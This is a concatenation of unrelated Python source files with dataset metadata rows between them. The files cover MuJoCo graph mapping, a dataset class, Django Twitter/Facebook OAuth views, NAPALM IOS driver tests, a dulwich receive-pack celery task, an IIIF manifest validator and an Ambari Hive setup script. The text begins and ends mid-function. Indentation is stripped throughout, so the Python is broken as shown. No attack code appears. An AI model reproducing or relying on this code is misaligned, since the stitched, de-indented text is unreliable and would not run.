# the name format: "@type_@name_@number", e.g.: joint_leg_1
assert len(node_name.split('_')) == 3
# find all the repetitive node and calculate the average
repetitive_struct_node_list = [
ienv_node_name_list.index(name)
for name in ienv_node_name_list
if node_name.split('_')[1] == name.split('_')[1]
]
num_reptitive_nodes = float(len(repetitive_struct_node_list))
assert len(repetitive_struct_node_list) >= 1
for i_node_id in repetitive_struct_node_list:
o_value[output_id] += i_value[
ienv_info['output_list'].index(i_node_id)
] / num_reptitive_nodes
return np.transpose(o_value) + added_constant
def map_input(transfer_env, i_value, added_constant, gnn_option_list):
assert len(gnn_option_list) == 4
ienv, oenv = [env + '-v1' for env in transfer_env.split('2')]
ienv_info = mujoco_parser.parse_mujoco_graph(
ienv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
oenv_info = mujoco_parser.parse_mujoco_graph(
oenv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
o_value = np.zeros([oenv_info['debug_info']['ob_size'], i_value.shape[1]])
assert len(i_value) == ienv_info['debug_info']['ob_size']
ienv_node_name_list = [node['name'] for node in ienv_info['tree']]
for output_id, output_node_id in oenv_info['input_dict'].items():
# get the name of the joint
node_name = oenv_info['tree'][output_id]['name']
# if the node is alreay in the input environment?
if node_name in ienv_node_name_list:
o_value[output_node_id] = i_value[
ienv_info['input_dict'][
ienv_node_name_list.index(node_name)
]
]
else:
continue
return o_value
def map_transfer_env_running_mean(ienv, oenv, running_mean_info,
observation_size,
gnn_node_option, root_connection_option,
gnn_output_option, gnn_embedding_option):
# parse the mujoco information
ienv_info = mujoco_parser.parse_mujoco_graph(
ienv,
gnn_node_option=gnn_node_option,
root_connection_option=root_connection_option,
gnn_output_option=gnn_output_option,
gnn_embedding_option=gnn_embedding_option
)
oenv_info = mujoco_parser.parse_mujoco_graph(
oenv,
gnn_node_option=gnn_node_option,
root_connection_option=root_connection_option,
gnn_output_option=gnn_output_option,
gnn_embedding_option=gnn_embedding_option
)
i_running_mean_info = running_mean_info
# we start the running mean by cutting the mean to 0.1
start_coeff = 1
o_running_mean_info = {
'step': i_running_mean_info['step'] * start_coeff,
'mean': np.zeros([observation_size]),
'variance': np.zeros([observation_size]),
'square_sum': np.zeros([observation_size]),
'sum': np.zeros([observation_size])
}
ienv_node_name_list = [node['name'] for node in ienv_info['tree']]
for node, oenv_digit in oenv_info['input_dict'].items():
node_name = oenv_info['tree'][node]['name']
# if the node is alreay in the input environment?
if node_name in ienv_node_name_list:
ienv_digit = ienv_info['input_dict'][
ienv_node_name_list.index(node_name)
]
assert len(ienv_digit) == len(oenv_digit)
# assign the value!
for key in ['square_sum', 'sum']:
o_running_mean_info[key][oenv_digit] = \
i_running_mean_info[key][ienv_digit] * start_coeff
for key in ['mean', 'variance']:
o_running_mean_info[key][oenv_digit] = \
i_running_mean_info[key][ienv_digit]
else:
# the name format: "@type_@name_@number", e.g.: joint_leg_1
assert len(node_name.split('_')) == 3
# find all the repetitive node and calculate the average
repetitive_struct_node_list = [
ienv_node_name_list.index(name)
for name in ienv_node_name_list
if node_name.split('_')[1] == name.split('_')[1]
]
assert len(repetitive_struct_node_list) >= 1
num_reptitive_nodes = float(len(repetitive_struct_node_list))
for i_node_id in repetitive_struct_node_list:
ienv_digit = ienv_info['input_dict'][i_node_id]
assert len(ienv_digit) == len(oenv_digit)
# assign the value!
for key in ['square_sum', 'sum']:
o_running_mean_info[key][oenv_digit] += \
i_running_mean_info[key][ienv_digit] * \
start_coeff / num_reptitive_nodes
for key in ['mean', 'variance']:
o_running_mean_info[key][oenv_digit] += \
i_running_mean_info[key][ienv_digit] / \
num_reptitive_nodes
return o_running_mean_info
| mit | 7,428,175,684,621,202,000 | 40.152632 | 79 | 0.553012 | false | 3.399565 | false | false | false |
vitordeatorreao/amproj | amproj/datasets/dataset.py | 1 | 3520 | """Base class for a memory representation of any dataset"""
class Dataset:
"""Represents a dataset read to memory"""
def __init__(self, feature_names=[]):
"""Initializes a new instance of Dataset
Parameters
----------
feature_names : list<str>, optional
List of names of the features present in this dataset.
"""
if type(feature_names) != list:
raise TypeError(
"The `feature_names` argument must be of type list")
self.features = [str(name) for name in feature_names]
self.data = []
def add_datapoint(self, datapoint):
"""Adds a datapoint to the dataset
Parameters
----------
datapoint : list
A list containing the feature values.
"""
point = {} # datapoint to be built and inserted in the dataset
if len(self.features) == 0: # in case there are no feature names
if len(self.data) > 0 and len(self.data[0]) != len(datapoint):
raise TypeError("The new datapoint must be of the same size " +
"as the other datapoints. The new datapoint " +
"has size " + str(len(datapoint)) + ", but " +
"the other datapoints have size " +
str(len(self.data[0])) + ".")
i = 0
for value in datapoint:
point["feature" + str(i)] = self.__tryparse__(value)
i += 1
self.data.append(point)
return
if len(datapoint) != len(self.features):
raise TypeError("The datapoint must be of the same size as " +
"the features list. The features list has size " +
str(len(self.features)) + " and the datapoint " +
"has size " + str(len(datapoint)) + ". The " +
"datapoint is " + str(datapoint))
i = 0
for feature_name in self.features:
point[feature_name] = self.__tryparse__(datapoint[i])
i += 1
self.data.append(point) # actually adds the datapoint to the set
def __len__(self):
"""Returns the length of this dataset"""
return len(self.data)
def __iter__(self):
"""Iterates through the objects in this dataset"""
return iter(self.data)
def __getitem__(self, key):
"""Gets the dataset at the specified index"""
if type(key) != int:
raise TypeError("The index must be an integer, instead got " + key)
return self.data[key]
def __tryparse__(self, value):
"""Parses the value into int, float or string
Parameters
----------
value : str
A value to be parsed.
Returns
-------
val : int, float or str
The value after being parsed to its correct type.
Notes
-----
The value will be parsed in a try and error way. First, we try to cast
it to int. If that fails, we try to cast it to float. And if that fails
as well, we simply return it as string.
"""
value = value.strip()
if type(value) != str:
return value
try:
return int(value)
except ValueError:
pass
try:
return float(value)
except ValueError:
pass
return value
| gpl-2.0 | 126,932,584,548,431,800 | 34.555556 | 79 | 0.511932 | false | 4.637681 | false | false | false |
lmorchard/badger | apps/socialconnect/views.py | 1 | 12314 | import urllib, urllib2
import cgi
import os
from django.conf import settings
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth import login, authenticate, REDIRECT_FIELD_NAME
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.contrib.sites.models import Site
from django.utils.http import urlquote
from django.utils import simplejson as json
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib import messages
from oauthtwitter import OAuthApi
from oauth import oauth
import oauthtwitter
from pinax.apps.account.utils import get_default_redirect, user_display
from pinax.apps.account.views import login as account_login
from socialconnect.utils import Router, BaseView
from socialconnect.forms import OauthSignupForm
from socialconnect.models import UserOauthAssociation
TWITTER_CONSUMER_KEY = getattr(settings, 'TWITTER_CONSUMER_KEY', 'YOUR_KEY')
TWITTER_CONSUMER_SECRET = getattr(settings, 'TWITTER_CONSUMER_SECRET', 'YOUR_SECRET')
FACEBOOK_CONSUMER_KEY = getattr(settings, 'FACEBOOK_CONSUMER_KEY', 'YOUR_KEY')
FACEBOOK_CONSUMER_SECRET = getattr(settings, 'FACEBOOK_CONSUMER_SECRET', 'YOUR_SECRET')
class ManagementView(BaseView):
"""Connection management view, mainly for removing associations"""
urlname_pattern = 'socialconnect_manage_%s'
def do_associations(self, request):
v = self.require_login(request)
if v is not True: return v
if request.method == "POST":
a_id = request.POST.get('id', None)
try:
assoc = UserOauthAssociation.objects.get(
user = request.user, id = a_id)
messages.add_message(request, messages.SUCCESS,
ugettext("""
Successfully deleted connection to %(auth_type)s
screen name %(username)s.
""") % {
"auth_type": assoc.auth_type,
"username": assoc.username
}
)
assoc.delete()
except UserOauthAssociation.DoesNotExist:
pass
return HttpResponseRedirect(reverse(
self.urlname_pattern % 'associations'))
associations = UserOauthAssociation.objects.filter(user=request.user)
return self.render(request, 'associations.html', {
'associations': associations
})
class BaseAuthView(BaseView):
def do_signin(self, request):
"""Perform sign in via OAuth"""
request.session['socialconnect_mode'] = request.GET.get('mode', 'signin')
next = request.GET.get(REDIRECT_FIELD_NAME, '/')
if next:
request.session['redirect_to'] = next
return HttpResponseRedirect(self.get_signin_url(request))
def do_callback(self, request):
"""Handle response from OAuth permit/deny"""
# TODO: Handle OAuth denial!
mode = request.session.get('socialconnect_mode', None)
profile = self.get_profile_from_callback(request)
if not profile: return HttpResponse(status=400)
request.session[self.session_profile] = profile
success_url = get_default_redirect(request, REDIRECT_FIELD_NAME)
if not success_url or 'None' == success_url:
success_url = '/'
try:
# Try looking for an association to perform a login.
assoc = UserOauthAssociation.objects.filter(
auth_type=self.auth_type,
profile_id=profile['id'],
username=profile['username']
).get()
if 'connect' == mode:
messages.add_message(request, messages.ERROR,
ugettext("""This service is already connected to another
account!""")
)
return HttpResponseRedirect(reverse(
ManagementView().urlname_pattern % 'associations'))
else:
self.log_in_user(request, assoc.user)
return HttpResponseRedirect(success_url)
except UserOauthAssociation.DoesNotExist:
# No association found, so...
if not request.user.is_authenticated():
# If no login session, bounce to registration
return HttpResponseRedirect(reverse(
self.urlname_pattern % 'register'))
else:
# If there's a login session, create an association to the
# currently logged in user.
assoc = self.create_association(request, request.user, profile)
del request.session[self.session_profile]
if 'connect' == mode:
return HttpResponseRedirect(reverse(
ManagementView().urlname_pattern % 'associations'))
else:
return HttpResponseRedirect(success_url)
def get_registration_form_class(self, request):
return OauthSignupForm
def do_register(self, request):
"""Handle registration with association"""
# Ensure that Twitter signin details are present in the session
profile = request.session.get(self.session_profile, None)
if not profile: return HttpResponse(status=400)
RegistrationForm = self.get_registration_form_class(request)
success_url = get_default_redirect(request, REDIRECT_FIELD_NAME)
if request.method != "POST":
# Pre-fill form with suggested info based in Twitter signin
form = RegistrationForm(initial = self.initial_from_profile(profile))
else:
form = RegistrationForm(request.POST)
if form.is_valid():
user = form.save(request=request)
assoc = self.create_association(request, user, profile)
self.log_in_user(request, user)
return HttpResponseRedirect(success_url)
return self.render(request, 'register.html', {
'form': form,
'auth_label': self.auth_label,
'signin_url': reverse(self.urlname_pattern % 'signin'),
"action": request.path,
})
def create_association(self, request, user, profile):
"""Create an association between this user and the given profile"""
assoc = UserOauthAssociation(
user=user,
auth_type=self.auth_type,
profile_id=profile['id'],
username=profile['username'],
access_token=profile['access_token']
)
assoc.save()
messages.add_message(request, messages.SUCCESS,
ugettext("""
Successfully associated %(user)s with %(auth_label)s
screen name %(username)s.
""") % {
"user": user_display(request.user),
"auth_label": self.auth_label,
"username": profile['username']
}
)
def suggest_nickname(self, nickname):
"Return a suggested nickname that has not yet been taken"
from django.contrib.auth.models import User
if not nickname:
return ''
original_nickname = nickname
suffix = None
while User.objects.filter(username = nickname).count():
if suffix is None:
suffix = 1
else:
suffix += 1
nickname = original_nickname + str(suffix)
return nickname
def log_in_user(self, request, user):
# Remember, openid might be None (after registration with none set)
from django.contrib.auth import login
# Nasty but necessary - annotate user and pretend it was the regular
# auth backend. This is needed so django.contrib.auth.get_user works:
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
class TwitterAuthView(BaseAuthView):
auth_type = "twitter"
auth_label = _("Twitter")
urlname_pattern = 'socialconnect_twitter_%s'
consumer_key = TWITTER_CONSUMER_KEY
consumer_secret = TWITTER_CONSUMER_SECRET
session_access_token = 'twitter_access_token'
session_profile = 'twitter_profile'
def get_signin_url(self, request):
twitter = OAuthApi(self.consumer_key, self.consumer_secret)
request_token = twitter.getRequestToken()
request.session['twitter_request_token'] = request_token.to_string()
return twitter.getSigninURL(request_token)
def get_profile_from_callback(self, request):
"""Extract the access token and profile details from OAuth callback"""
request_token = request.session.get('twitter_request_token', None)
if not request_token: return None
token = oauth.OAuthToken.from_string(request_token)
if token.key != request.GET.get('oauth_token', 'no-token'):
return HttpResponse(status=400)
twitter = OAuthApi(self.consumer_key, self.consumer_secret, token)
access_token = twitter.getAccessToken()
twitter = oauthtwitter.OAuthApi(self.consumer_key,
self.consumer_secret, access_token)
try:
profile = twitter.GetUserInfo()
except:
return None
return {
'access_token': access_token.to_string(),
'id': profile.id,
'username': profile.screen_name,
'fullname': profile.name,
'email': '',
}
def initial_from_profile(self, profile):
fullname = profile['fullname']
first_name, last_name = '', ''
if fullname:
bits = fullname.split()
first_name = bits[0]
if len(bits) > 1:
last_name = ' '.join(bits[1:])
return {
'username': self.suggest_nickname(profile.get('username','')),
'first_name': first_name,
'last_name': last_name,
'email': ''
}
class FacebookAuthView(BaseAuthView):
auth_type = "facebook"
auth_label = _("Facebook")
urlname_pattern = 'socialconnect_facebook_%s'
consumer_key = FACEBOOK_CONSUMER_KEY
consumer_secret = FACEBOOK_CONSUMER_SECRET
session_access_token = 'facebook_access_token'
session_profile = 'facebook_profile'
def get_signin_url(self, request):
args = {
'client_id': self.consumer_key,
'redirect_uri': request.build_absolute_uri(
reverse('socialconnect_facebook_callback')),
'scope': 'publish_stream,offline_access'
}
return ("https://graph.facebook.com/oauth/authorize?" +
urllib.urlencode(args))
def get_profile_from_callback(self, request):
code = request.GET.get('code', None)
args = {
'client_id': self.consumer_key,
'client_secret': self.consumer_secret,
'redirect_uri': request.build_absolute_uri(
reverse('socialconnect_facebook_callback')),
'code': code,
}
access_token_url = ()
response = cgi.parse_qs(urllib2.urlopen(
"https://graph.facebook.com/oauth/access_token?" +
urllib.urlencode(args)
).read())
access_token = response["access_token"][-1]
profile = json.load(urllib2.urlopen("https://graph.facebook.com/me?" +
urllib.urlencode(dict(access_token=access_token))))
return {
'access_token': access_token,
'id': profile['id'],
'username': os.path.basename(profile.get('link','')),
'fullname': profile.get('name', ''),
'first_name': profile.get('first_name', ''),
'last_name': profile.get('last_name', ''),
'email': '',
}
def initial_from_profile(self, profile):
return {
'username': self.suggest_nickname(profile.get('username','')),
'first_name': profile.get('first_name', ''),
'last_name': profile.get('last_name', ''),
'email': ''
}
| bsd-3-clause | 6,301,588,463,236,984,000 | 36.889231 | 87 | 0.598993 | false | 4.369766 | false | false | false |
napalm-automation/napalm | test/ios/TestIOSDriver.py | 1 | 6582 | # Copyright 2015 Spotify AB. All rights reserved.
#
# The contents of this file are licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Tests for IOSDriver."""
import unittest
from napalm.ios import ios
from napalm.base.test.base import TestConfigNetworkDriver, TestGettersNetworkDriver
import re
class TestConfigIOSDriver(unittest.TestCase, TestConfigNetworkDriver):
"""Configuration Tests for IOSDriver.
Core file operations:
load_replace_candidate Tested
load_merge_candidate Tested
compare_config Tested
commit_config Tested
discard_config Tested
rollback Tested
Internal methods:
_enable_confirm Tested
_disable_confirm Tested
_gen_rollback_cfg Tested as part of rollback
_check_file_exists Tested
Misc methods:
open Tested
close Skipped
normalize_compare_config Tested (indirectly)
scp_file Tested
gen_full_path Tested
"""
@classmethod
def setUpClass(cls):
"""Executed when the class is instantiated."""
ip_addr = "127.0.0.1"
username = "vagrant"
password = "vagrant"
cls.vendor = "ios"
optional_args = {"port": 12204, "dest_file_system": "bootflash:"}
cls.device = ios.IOSDriver(
ip_addr, username, password, optional_args=optional_args
)
cls.device.open()
# Setup initial state
cls.device.load_replace_candidate(filename="%s/initial.conf" % cls.vendor)
cls.device.commit_config()
def test_ios_only_confirm(self):
"""Test _disable_confirm() and _enable_confirm().
_disable_confirm() changes router config so it doesn't prompt for confirmation
_enable_confirm() reenables this
"""
# Set initial device configuration
self.device.load_replace_candidate(filename="%s/initial.conf" % self.vendor)
self.device.commit_config()
# Verify initial state
output = self.device.device.send_command("show run | inc file prompt")
output = output.strip()
self.assertEqual(output, "")
# Disable confirmation
self.device._disable_confirm()
output = self.device.device.send_command("show run | inc file prompt")
output = output.strip()
self.assertEqual(output, "file prompt quiet")
# Reenable confirmation
self.device._enable_confirm()
output = self.device.device.send_command("show run | inc file prompt")
output = output.strip()
self.assertEqual(output, "")
def test_ios_only_gen_full_path(self):
"""Test gen_full_path() method."""
output = self.device._gen_full_path(self.device.candidate_cfg)
self.assertEqual(output, self.device.dest_file_system + "/candidate_config.txt")
output = self.device._gen_full_path(self.device.rollback_cfg)
self.assertEqual(output, self.device.dest_file_system + "/rollback_config.txt")
output = self.device._gen_full_path(self.device.merge_cfg)
self.assertEqual(output, self.device.dest_file_system + "/merge_config.txt")
output = self.device._gen_full_path(
filename="running-config", file_system="system:"
)
self.assertEqual(output, "system:/running-config")
def test_ios_only_check_file_exists(self):
"""Test _check_file_exists() method."""
self.device.load_replace_candidate(filename="%s/initial.conf" % self.vendor)
valid_file = self.device._check_file_exists(
self.device.dest_file_system + "/candidate_config.txt"
)
self.assertTrue(valid_file)
invalid_file = self.device._check_file_exists(
self.device.dest_file_system + "/bogus_999.txt"
)
self.assertFalse(invalid_file)
class TestGetterIOSDriver(unittest.TestCase, TestGettersNetworkDriver):
"""Getters Tests for IOSDriver.
Get operations:
get_lldp_neighbors
get_facts
get_interfaces
get_bgp_neighbors
get_interfaces_counters
"""
@classmethod
def setUpClass(cls):
"""Executed when the class is instantiated."""
cls.mock = True
username = "vagrant"
ip_addr = "192.168.0.234"
password = "vagrant"
cls.vendor = "ios"
optional_args = {}
optional_args["dest_file_system"] = "flash:"
cls.device = ios.IOSDriver(
ip_addr, username, password, optional_args=optional_args
)
if cls.mock:
cls.device.device = FakeIOSDevice()
else:
cls.device.open()
def test_ios_only_bgp_time_conversion(self):
"""Verify time conversion static method."""
test_cases = {
"1w0d": 604800,
"00:14:23": 863,
"00:13:40": 820,
"00:00:21": 21,
"00:00:13": 13,
"00:00:49": 49,
"1d11h": 126000,
"1d17h": 147600,
"8w5d": 5270400,
"1y28w": 48470400,
"never": -1,
}
for bgp_time, result in test_cases.items():
self.assertEqual(self.device.bgp_time_conversion(bgp_time), result)
class FakeIOSDevice:
"""Class to fake a IOS Device."""
@staticmethod
def read_txt_file(filename):
"""Read a txt file and return its content."""
with open(filename) as data_file:
return data_file.read()
def send_command_expect(self, command, **kwargs):
"""Fake execute a command in the device by just returning the content of a file."""
cmd = re.sub(r"[\[\]\*\^\+\s\|]", "_", command)
output = self.read_txt_file("ios/mock_data/{}.txt".format(cmd))
return str(output)
def send_command(self, command, **kwargs):
"""Fake execute a command in the device by just returning the content of a file."""
return self.send_command_expect(command)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -1,167,232,957,800,592,000 | 32.753846 | 91 | 0.614707 | false | 3.94841 | true | false | false |
emulbreh/vacuous | vacuous/backends/dulwich/tasks.py | 1 | 1530 | from StringIO import StringIO
from celery.task import Task
from celery.task.sets import TaskSet, subtask
from dulwich.protocol import ReceivableProtocol
from dulwich.server import ReceivePackHandler
from vacuous.backends import load_backend
from vacuous.backends.dulwich.utils import WebBackend
from vacuous.tasks import SyncTask
class _ReceivePackHandler(ReceivePackHandler):
def _apply_pack(self, refs):
result = super(_ReceivePackHandler, self)._apply_pack(refs)
status = dict(result)
self._good_refs = []
for oldsha, newsha, ref in refs:
if status[ref] == 'ok':
self._good_refs.append((oldsha, newsha, ref))
return result
class ReceivePackTask(Task):
def run(self, flavor, repo_path, data):
backend = load_backend(flavor, repo_path, cache=False)
out = StringIO()
proto = ReceivableProtocol(StringIO(data).read, out.write)
handler = _ReceivePackHandler(WebBackend(), [backend], proto, stateless_rpc=True)
handler.handle()
sync_tasks = []
for oldrev, newrev, name in handler._good_refs:
if name.startswith('refs/heads/'):
branch = name[11:]
sync_tasks.append(subtask(SyncTask, args=[backend.flavor, backend.path, oldrev, newrev, branch]))
if sync_tasks:
taskset = TaskSet(tasks=sync_tasks)
taskset.apply_async().join()
return out.getvalue(), handler._good_refs
| mit | -4,407,668,046,472,185,000 | 33.772727 | 113 | 0.640523 | false | 3.963731 | false | false | false |
hashimmm/iiifoo | testutils/manifest_validator.py | 1 | 3963 | from testutils.presentation_api.implementations.manifest_factory.loader import \
ManifestReader
from iiifoo_utils import image_id_from_canvas_id
def validate(manifestjson, logger=None):
"""Validate a given manifest json object."""
mr = ManifestReader(manifestjson)
try:
r = mr.read()
js = r.toJSON()
except Exception as e:
if logger:
logger.exception(e)
print e
valid = False
else:
valid = True
print mr.get_warnings()
if logger:
logger.warn(mr.get_warnings())
return valid
def assert_equal(first, second):
assert first == second, \
"%s != %s" % (first, second)
def ensure_manifest_details_integrity(detailsobj, manifest_json, start=0):
sequences = manifest_json['sequences']
canvases = sequences[0]['canvases']
no_of_images = len(detailsobj['images'])
assert_equal(len(sequences), 1)
assert_equal(len(canvases), no_of_images + start)
for i in xrange(start, start+no_of_images):
assert_equal(canvases[i]['label'],
detailsobj['images'][i-start]['name'])
assert_equal(canvases[i]['width'],
detailsobj['images'][i-start]['width'])
assert_equal(canvases[i]['height'],
detailsobj['images'][i-start]['height'])
image_resource = canvases[i]['images'][0]['resource']
assert_equal(image_resource['service']['@id'],
detailsobj['images'][i-start]['path'])
assert_equal(image_resource['width'],
detailsobj['images'][i-start]['width'])
assert_equal(image_resource['height'],
detailsobj['images'][i-start]['height'])
def ensure_manifest_schema_conformance(manifest_json):
assert validate(manifest_json), \
"Manifest json: \n%s\n is invalid" % manifest_json
def check_updated_details(manifest_json, details):
sequences = manifest_json['sequences']
canvases = sequences[0]['canvases']
new_image_ids = [image['image_id'] for image in details['images']]
updated_canvases = [canvas for canvas in canvases
if image_id_from_canvas_id(canvas["@id"])
in new_image_ids]
updated_canvases = {image_id_from_canvas_id(canvas["@id"]): canvas
for canvas in updated_canvases}
assert_equal(manifest_json['label'], details['manifest_label'])
for image_id in new_image_ids:
canvas = updated_canvases[image_id]
image = [image for image in details['images']
if image['image_id'] == image_id][0]
assert_equal(canvas['label'], image['name'])
assert_equal(canvas['width'], image['width'])
assert_equal(canvas['height'], image['height'])
image_resource = canvas['images'][0]['resource']
assert_equal(image_resource['service']['@id'], image['path'])
assert_equal(image_resource['width'], image['width'])
assert_equal(image_resource['height'], image['height'])
def check_annotations_in_list(annotation_list, imageobj):
resources = annotation_list['resources']
relevant_resources = []
for resource in resources:
if image_id_from_canvas_id(resource['on']) == imageobj['image_id']:
relevant_resources.append(resource)
list_comments = [item['resource']['chars'] for item in resources
if item['motivation'] == "oa:commenting"]
list_transcriptions = [item['resource']['chars'] for item in resources
if item['resource']['@type'] == "cnt:ContentAsText"]
for comment in imageobj.get('comments', []):
assert comment['text'] in list_comments, \
"Comment %s not found" % comment['text']
for transcription in imageobj.get('transcriptions', []):
assert transcription['text'] in list_transcriptions, \
"Comment %s not found" % transcription['text']
| mit | 5,603,357,598,368,924,000 | 40.715789 | 80 | 0.607368 | false | 3.966967 | false | false | false |
radicalbit/ambari | ambari-server/src/main/resources/common-services/HIVE/0.12.0.2.0/package/scripts/hive.py | 1 | 23158 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import glob
from urlparse import urlparse
from resource_management.libraries.script.script import Script
from resource_management.libraries.resources.hdfs_resource import HdfsResource
from resource_management.libraries.functions.copy_tarball import copy_to_hdfs
from resource_management.libraries.functions.get_config import get_config
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.core.resources.service import ServiceConfig
from resource_management.core.resources.system import File, Execute, Directory
from resource_management.core.source import StaticFile, Template, DownloadSource, InlineTemplate
from resource_management.core.shell import as_user
from resource_management.libraries.functions.is_empty import is_empty
from resource_management.libraries.resources.xml_config import XmlConfig
from resource_management.libraries.functions.format import format
from resource_management.core.exceptions import Fail
from resource_management.core.shell import as_sudo
from resource_management.core.shell import quote_bash_args
from resource_management.core.logger import Logger
from resource_management.core import utils
from resource_management.libraries.functions.setup_atlas_hook import has_atlas_in_cluster, setup_atlas_hook
from resource_management.libraries.functions.security_commons import update_credential_provider_path
from ambari_commons.constants import SERVICE
from ambari_commons.os_family_impl import OsFamilyFuncImpl, OsFamilyImpl
from ambari_commons import OSConst
@OsFamilyFuncImpl(os_family=OsFamilyImpl.DEFAULT)
def hive(name=None):
import params
hive_client_conf_path = format("{stack_root}/current/{component_directory}/conf")
# Permissions 644 for conf dir (client) files, and 600 for conf.server
mode_identified = 0644 if params.hive_config_dir == hive_client_conf_path else 0600
Directory(params.hive_etc_dir_prefix,
mode=0755
)
# We should change configurations for client as well as for server.
# The reason is that stale-configs are service-level, not component.
Logger.info("Directories to fill with configs: %s" % str(params.hive_conf_dirs_list))
for conf_dir in params.hive_conf_dirs_list:
fill_conf_dir(conf_dir)
params.hive_site_config = update_credential_provider_path(params.hive_site_config,
'hive-site',
os.path.join(params.hive_conf_dir, 'hive-site.jceks'),
params.hive_user,
params.user_group
)
XmlConfig("hive-site.xml",
conf_dir=params.hive_config_dir,
configurations=params.hive_site_config,
configuration_attributes=params.config['configuration_attributes']['hive-site'],
owner=params.hive_user,
group=params.user_group,
mode=mode_identified)
# Generate atlas-application.properties.xml file
if params.enable_atlas_hook:
atlas_hook_filepath = os.path.join(params.hive_config_dir, params.atlas_hook_filename)
setup_atlas_hook(SERVICE.HIVE, params.hive_atlas_application_properties, atlas_hook_filepath, params.hive_user, params.user_group)
File(format("{hive_config_dir}/hive-env.sh"),
owner=params.hive_user,
group=params.user_group,
content=InlineTemplate(params.hive_env_sh_template),
mode=mode_identified
)
# On some OS this folder could be not exists, so we will create it before pushing there files
Directory(params.limits_conf_dir,
create_parents = True,
owner='root',
group='root'
)
File(os.path.join(params.limits_conf_dir, 'hive.conf'),
owner='root',
group='root',
mode=0644,
content=Template("hive.conf.j2")
)
if params.security_enabled:
File(os.path.join(params.hive_config_dir, 'zkmigrator_jaas.conf'),
owner=params.hive_user,
group=params.user_group,
content=Template("zkmigrator_jaas.conf.j2")
)
File(format("/usr/lib/ambari-agent/{check_db_connection_jar_name}"),
content = DownloadSource(format("{jdk_location}{check_db_connection_jar_name}")),
mode = 0644,
)
if name != "client":
setup_non_client()
if name == 'hiveserver2':
setup_hiveserver2()
if name == 'metastore':
setup_metastore()
def setup_hiveserver2():
import params
File(params.start_hiveserver2_path,
mode=0755,
content=Template(format('{start_hiveserver2_script}'))
)
File(os.path.join(params.hive_server_conf_dir, "hadoop-metrics2-hiveserver2.properties"),
owner=params.hive_user,
group=params.user_group,
content=Template("hadoop-metrics2-hiveserver2.properties.j2"),
mode=0600
)
XmlConfig("hiveserver2-site.xml",
conf_dir=params.hive_server_conf_dir,
configurations=params.config['configurations']['hiveserver2-site'],
configuration_attributes=params.config['configuration_attributes']['hiveserver2-site'],
owner=params.hive_user,
group=params.user_group,
mode=0600)
# copy tarball to HDFS feature not supported
if not (params.stack_version_formatted_major and check_stack_feature(StackFeature.COPY_TARBALL_TO_HDFS, params.stack_version_formatted_major)):
params.HdfsResource(params.webhcat_apps_dir,
type="directory",
action="create_on_execute",
owner=params.webhcat_user,
mode=0755
)
# Create webhcat dirs.
if params.hcat_hdfs_user_dir != params.webhcat_hdfs_user_dir:
params.HdfsResource(params.hcat_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.webhcat_user,
mode=params.hcat_hdfs_user_mode
)
params.HdfsResource(params.webhcat_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.webhcat_user,
mode=params.webhcat_hdfs_user_mode
)
# ****** Begin Copy Tarballs ******
# *********************************
# if copy tarball to HDFS feature supported copy mapreduce.tar.gz and tez.tar.gz to HDFS
if params.stack_version_formatted_major and check_stack_feature(StackFeature.COPY_TARBALL_TO_HDFS, params.stack_version_formatted_major):
copy_to_hdfs("mapreduce", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs)
copy_to_hdfs("tez", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs)
# Always copy pig.tar.gz and hive.tar.gz using the appropriate mode.
# This can use a different source and dest location to account
copy_to_hdfs("pig",
params.user_group,
params.hdfs_user,
file_mode=params.tarballs_mode,
custom_source_file=params.pig_tar_source,
custom_dest_file=params.pig_tar_dest_file,
skip=params.sysprep_skip_copy_tarballs_hdfs)
copy_to_hdfs("hive",
params.user_group,
params.hdfs_user,
file_mode=params.tarballs_mode,
custom_source_file=params.hive_tar_source,
custom_dest_file=params.hive_tar_dest_file,
skip=params.sysprep_skip_copy_tarballs_hdfs)
wildcard_tarballs = ["sqoop", "hadoop_streaming"]
for tarball_name in wildcard_tarballs:
source_file_pattern = eval("params." + tarball_name + "_tar_source")
dest_dir = eval("params." + tarball_name + "_tar_dest_dir")
if source_file_pattern is None or dest_dir is None:
continue
source_files = glob.glob(source_file_pattern) if "*" in source_file_pattern else [source_file_pattern]
for source_file in source_files:
src_filename = os.path.basename(source_file)
dest_file = os.path.join(dest_dir, src_filename)
copy_to_hdfs(tarball_name,
params.user_group,
params.hdfs_user,
file_mode=params.tarballs_mode,
custom_source_file=source_file,
custom_dest_file=dest_file,
skip=params.sysprep_skip_copy_tarballs_hdfs)
# ******* End Copy Tarballs *******
# *********************************
# if warehouse directory is in DFS
